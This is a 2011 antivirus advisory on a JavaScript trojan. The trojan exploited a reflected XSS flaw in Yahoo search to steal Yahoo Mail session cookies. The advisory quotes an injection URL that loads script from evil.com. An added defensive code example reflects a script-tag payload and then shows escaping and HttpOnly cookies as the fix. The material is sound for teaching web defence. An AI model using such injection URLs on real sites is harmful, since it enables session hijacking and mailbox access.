Trojan.JS.CookieMonster.A
First posted on 21 November 2011.
Source: BitDefender
Aliases :
There are no other names known for Trojan.JS.CookieMonster.A.
Explanation :
If the user clicks that link from webmail, he is redirected to a page that exploits a cross-site scripting (XSS) or HTML injection vulnerability. The effect is that the JavaScript it contains executes in the security context of Yahoo, and that JavaScript steals the user's cookies used for Yahoo Mail.
The vulnerability affects the Yahoo search engine, so browsers visiting the malicious page try to open:
http://search.yahoo.com/bin/search?p=[...http://evil.com/script.js...]
script.js is executed; it reads document.cookie to get the user's cookies and saves them.
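The reflection described above, shown from the defender's side as an added example (not part of the original write-up and not Yahoo's code). The renderer functions, cookie name and example hosts are hypothetical, and the sample query is constructed:

```javascript
'use strict';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode text for an HTML element or quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// "Before": p is reflected verbatim, so markup in the query becomes page
// markup and any script it pulls in runs with the site's origin.
function renderResultsUnsafe(p) {
  return `<h1>Results for ${p}</h1>`;
}

// "After": p is encoded on output, so the browser displays it as text.
function renderResultsSafe(p) {
  return `<h1>Results for ${escapeHtml(p)}</h1>`;
}

// HttpOnly keeps the session cookie out of document.cookie even if an
// injection is missed elsewhere; Secure restricts it to HTTPS.
function sessionCookieHeader(name, value) {
  return `Set-Cookie: ${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed sample request (placeholder hosts, not the URL from the page).
const sampleUrl = new URL('http://search.example/bin/search?p=' +
  encodeURIComponent('<script src="http://static.example/x.js"></script>'));
const sampleQuery = sampleUrl.searchParams.get('p');

console.log(renderResultsUnsafe(sampleQuery)); // response carries a live script element
console.log(renderResultsSafe(sampleQuery));   // same input rendered as inert text
console.log(sessionCookieHeader('session', 'constructed-value'));
```

Output encoding removes the injection point; the HttpOnly flag limits what a missed injection can read.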
Those cookies help the spammer hijack the Yahoo session and get into the user's mail account, where he can harvest contacts from the user's address book to send more spam, or read the user's mail even after the user has signed out.
Last update 21 November 2011